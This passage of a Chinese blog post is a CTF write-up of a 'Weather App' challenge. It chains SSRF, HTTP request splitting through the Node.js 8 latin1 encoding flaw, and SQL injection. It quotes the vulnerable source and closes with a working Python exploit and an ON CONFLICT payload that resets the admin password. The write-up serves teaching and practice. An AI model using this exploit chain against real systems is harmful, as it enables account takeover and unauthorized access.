<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line">	<span class="keyword">return</span> db.isAdmin(username, password)</span><br><span class="line">		.then(<span class="function"><span class="params">admin</span> =&gt;</span> &#123;</span><br><span class="line">			<span class="keyword">if</span> (admin) <span class="keyword">return</span> res.send(fs.readFileSync(<span class="string">'/app/flag'</span>).toString());</span><br><span class="line">			<span class="keyword">return</span> res.send(response(<span class="string">'You are not admin'</span>));</span><br><span class="line">		&#125;)</span><br></pre></td></tr></table></figure>

<p>函数使用了SQL语句获取用户名是不是admin来判断用户身份，并且使用了参数化查询无法进行SQL注入。那么既然使用了数据库，注册的时候必然也将用户名密码写入了数据库，跟进到数据库文件来看看。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> isAdmin(user, pass) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="keyword">async</span> (resolve, reject) =&gt; &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">let</span> smt = <span class="keyword">await</span> <span class="keyword">this</span>.db.prepare(<span class="string">'SELECT username FROM users WHERE username = ? and password = ?'</span>);</span><br><span class="line">            <span class="keyword">let</span> row = <span class="keyword">await</span> smt.get(user, pass);</span><br><span class="line">            resolve(row !== <span class="literal">undefined</span> ? row.username == <span class="string">'admin'</span> : <span class="literal">false</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span>(e) &#123;</span><br><span class="line">            reject(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>数据库文件中的注册函数并没有使用参数化查询，因此存在SQL注入漏洞。但是难点在于注册功能只能从本地发起，因此想利用此漏洞还需要SSRF的配合。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> register(user, pass) &#123;</span><br><span class="line">    <span class="comment">// <span class="doctag">TODO:</span> add parameterization and roll public</span></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="keyword">async</span> (resolve, reject) =&gt; &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">let</span> query = <span class="string">`INSERT INTO users (username, password) VALUES ('<span class="subst">$&#123;user&#125;</span>', '<span class="subst">$&#123;pass&#125;</span>')`</span>;</span><br><span class="line">            resolve((<span class="keyword">await</span> <span class="keyword">this</span>.db.run(query)));</span><br><span class="line">        &#125; <span class="keyword">catch</span>(e) &#123;</span><br><span class="line">            reject(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在路由的第三个功能也就是查询天气功能中调用了<code>getWeather</code>函数，其中发起了HTTP请求，参数为<code>endpoint</code>等等，这几个参数的来源也是可控的，因此在这里存在SSRF漏洞。但困难的事如何发起另一个POST请求来利用SQL注入漏洞呢？</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> getWeather(res, endpoint, city, country) &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// *.openweathermap.org is out of scope</span></span><br><span class="line">    <span class="keyword">let</span> apiKey = <span class="string">'10a62430af617a949055a46fa6dec32f'</span>;</span><br><span class="line">    <span class="keyword">let</span> weatherData = <span class="keyword">await</span> HttpHelper.HttpGet(<span class="string">`http://<span class="subst">$&#123;endpoint&#125;</span>/data/2.5/weather?q=<span class="subst">$&#123;city&#125;</span>,<span class="subst">$&#123;country&#125;</span>&amp;units=metric&amp;appid=<span class="subst">$&#123;apiKey&#125;</span>`</span>);</span><br></pre></td></tr></table></figure>

<h2 id="Request-Splitting-1"><a href="#Request-Splitting-1" class="headerlink" title="Request Splitting"></a>Request Splitting</h2><p>我们都知道HTTP请求都有着固定的格式，每一行后都会跟<code>\r\n</code>来换行。</p>
<p><img src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902011204.png" alt></p>
<p>假如有一个服务器接受用户的get请求并且附带参数.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /acceptAPI?parameter=</span><br></pre></td></tr></table></figure>

<p> 用户提交下面这样的参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x HTTP/1.1\r\n\r\nDELETE /acceptAPI HTTP/1.1\r\n</span><br></pre></td></tr></table></figure>

<p>服务器接收到的请求就会从一个变成两个，第一个正常请求被从中间插入。用户将第三行的<code>DELETE /acceptAPI HTTP/1.1</code>插入到了一个正常的GET请求中，导致服务器接收到了两个请求，这就是Request Splitting攻击最原始的样子。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/acceptAPI?parameter=x</span> HTTP/1.1</span><br><span class="line"></span><br><span class="line"><span class="keyword">DELETE</span> <span class="string">/acceptAPI</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host:*.*.*.*</span></span><br><span class="line"><span class="attribute">Content-Length:**</span></span><br><span class="line"><span class="attribute">Pragma</span>: *</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>为了防止出现如下这样的情况，HTTP库会将类似<code>\r\n</code>一类的针对HTTP协议的控制字符加上百分号转义<code>%0D%0A</code>，上面的CTF题中使用的Javascript也会做同样的事情。用户提交的恶意参数会变成下面这个样子</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x HTTP/1.1%0D%0ADELETE /acceptAPI HTTP/1.1%0D%0A</span><br></pre></td></tr></table></figure>

<p>上有政策下有对策，Node.js 8会吧HTTP请求整个使用<code>latin1</code>编码，unicode字符<code>\u010D\u010A</code>经过编码转换会变成HTTP请求控制字符<code>\r\n</code>。用这种方式就可以绕过转义，进行Request Splitting攻击。</p>
<h2 id="回到Weather-APP"><a href="#回到Weather-APP" class="headerlink" title="回到Weather APP"></a>回到Weather APP</h2><p>书接上文，利用Node.js 8 的编码漏洞，可以发送第二个POST请求进行SQL注入。找到数据库文件，其中包含了数据表的结构。看到数据表中的username字段属性是<code>UNIQUE</code>，因此只能通过更新的方式来将admin用户的密码更改为我们的已知密码而不是随机生成的未知密码。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> migrate() &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.db.exec(<span class="string">`</span></span><br><span class="line"><span class="string">        DROP TABLE IF EXISTS users;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        CREATE TABLE IF NOT EXISTS users (</span></span><br><span class="line"><span class="string">            id         INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,</span></span><br><span class="line"><span class="string">            username   VARCHAR(255) NOT NULL UNIQUE,</span></span><br><span class="line"><span class="string">            password   VARCHAR(255) NOT NULL</span></span><br><span class="line"><span class="string">        );</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        INSERT INTO users (username, password) VALUES ('admin', '<span class="subst">$&#123; crypto.randomBytes(<span class="number">32</span>).toString(<span class="string">'hex'</span>) &#125;</span>');</span></span><br><span class="line"><span class="string">    `</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">') ON CONFLICT(username) <span class="keyword">DO</span> <span class="keyword">UPDATE</span> <span class="keyword">SET</span> <span class="keyword">password</span> = <span class="string">'admin'</span>;<span class="comment">--</span></span><br></pre></td></tr></table></figure>

<p>接下来需要构造EXP，找到可控参数<code>endpoint</code>的输入点进行构造。我们想要发送的，也就是实现SQL注入攻击的HTTP请求如下</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/register</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 138.68.155.238:30819</span><br><span class="line"><span class="attribute">Content-Length</span>: *</span><br><span class="line"></span><br><span class="line">&#123;"endpoint":"') ON CONFLICT(username) DO UPDATE SET password = 'admin';-- ","city":"Dallas","country":"US"&#125;</span><br></pre></td></tr></table></figure>

<p>根据前面所说到的绕过方法，编写出最终的EXP，注意其中的单引号、双引号以及空格也需要进行编码。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://138.68.155.238:30819'</span></span><br><span class="line">username = <span class="string">"admin"</span></span><br><span class="line">password = <span class="string">"1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"</span></span><br><span class="line"><span class="comment"># 对空格、单引号、双引号进行编码</span></span><br><span class="line">parsedUsername = username.replace(<span class="string">" "</span>, <span class="string">"\u0120"</span>).replace(<span class="string">"'"</span>, <span class="string">"%27"</span>).replace(<span class="string">'"'</span>,<span class="string">"%22"</span>)</span><br><span class="line">parsedPassword = password.replace(<span class="string">" "</span>, <span class="string">"\u0120"</span>).replace(<span class="string">"'"</span>, <span class="string">"%27"</span>).replace(<span class="string">'"'</span>,<span class="string">"%22"</span>)</span><br><span class="line">contentLength = len(parsedUsername) + len(parsedPassword) + <span class="number">19</span></span><br><span class="line"></span><br><span class="line">endpoint = <span class="string">'127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120'</span>+ str(contentLength) +<span class="string">'\u010D\u010A\u010D\u010Ausername='</span> + parsedUsername + <span class="string">'&amp;password='</span> + parsedPassword+ <span class="string">'\u010D\u010A\u010D\u010AGET\u0120/?lol='</span></span><br><span class="line"></span><br><span class="line">r = requests.post(url + <span class="string">'/api/weather'</span>, json=&#123; <span class="string">'endpoint'</span>: endpoint, <span class="string">'city'</span>: <span class="string">'Dallas'</span>,<span class="string">'country'</span>: <span class="string">'USA'</span>&#125;)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>


      
    </div>

    

    
    
    

    

    
      
    
    

    
      <div>
        




  



<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>安大侠</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    
    <a href="http://ama666.cn/2021/09/01/SSRF Request-Splittingattack/" title="SSRF Request Splitting attack/SSRF之Request Splitting攻击">http://ama666.cn/2021/09/01/SSRF Request-Splittingattack/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li>
</ul>

      </div>
    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/07/13/phishing using Gophish/" rel="next" title="Phishing using Gophish/Gophish实战">
                <i class="fa fa-chevron-left"></i> Phishing using Gophish/Gophish实战
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/09/01/OWASP pentest/" rel="prev" title="OWASP penetration test/OWASP渗透测试秘籍">
                OWASP penetration test/OWASP渗透测试秘籍 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20190616124508.png" alt="安大侠">
            
              <p class="site-author-name" itemprop="name">安大侠</p>
              <div class="site-description motion-element" itemprop="description">每天挣扎的活着</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">66</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  
                    
                      <a href="/categories/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">12</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">标签</span>
                  
                </div>
              
            </nav>
          

          

          

          

          
             <div class="cc-license motion-element" itemprop="license">
              
              
                
              
              
              
              <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
             </div>
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hengyud.cn" title="https://hengyud.cn" rel="noopener" target="_blank">小P</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.lookupes.cn" title="http://blog.lookupes.cn" rel="noopener" target="_blank">孙哥</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://timeshu.github.io" title="https://timeshu.github.io" rel="noopener" target="_blank">Time</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://zo1ro.github.io" title="http://zo1ro.github.io" rel="noopener" target="_blank">imy0r1in</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://jgeek.cn/" title="https://jgeek.cn/" rel="noopener" target="_blank">\0x584A</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SSRF-Request-Splitting-Attack"><span class="nav-number">1.</span> <span class="nav-text">SSRF Request Splitting Attack</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Weather-APP"><span class="nav-number">1.1.</span> <span class="nav-text">Weather APP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Request-Splitting"><span class="nav-number">1.2.</span> <span class="nav-text">Request Splitting</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Back-to-Weather-APP"><span class="nav-number">1.3.</span> <span class="nav-text">Back to Weather APP</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SSRF之Request-Splitting攻击"><span class="nav-number">2.</span> <span class="nav-text">SSRF之Request Splitting攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Weather-APP-1"><span class="nav-number">2.1.</span> <span class="nav-text">Weather APP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Request-Splitting-1"><span class="nav-number">2.2.</span> <span class="nav-text">Request Splitting</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#回到Weather-APP"><span class="nav-number">2.3.</span> <span class="nav-text">回到Weather APP</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">安大侠</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.1.2</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.2"></script>

  <script src="/js/motion.js?v=7.1.2"></script>



  
  


  <script src="/js/affix.js?v=7.1.2"></script>

  <script src="/js/schemes/pisces.js?v=7.1.2"></script>




  
  <script src="/js/scrollspy.js?v=7.1.2"></script>
<script src="/js/post-details.js?v=7.1.2"></script>



  


  <script src="/js/next-boot.js?v=7.1.2"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
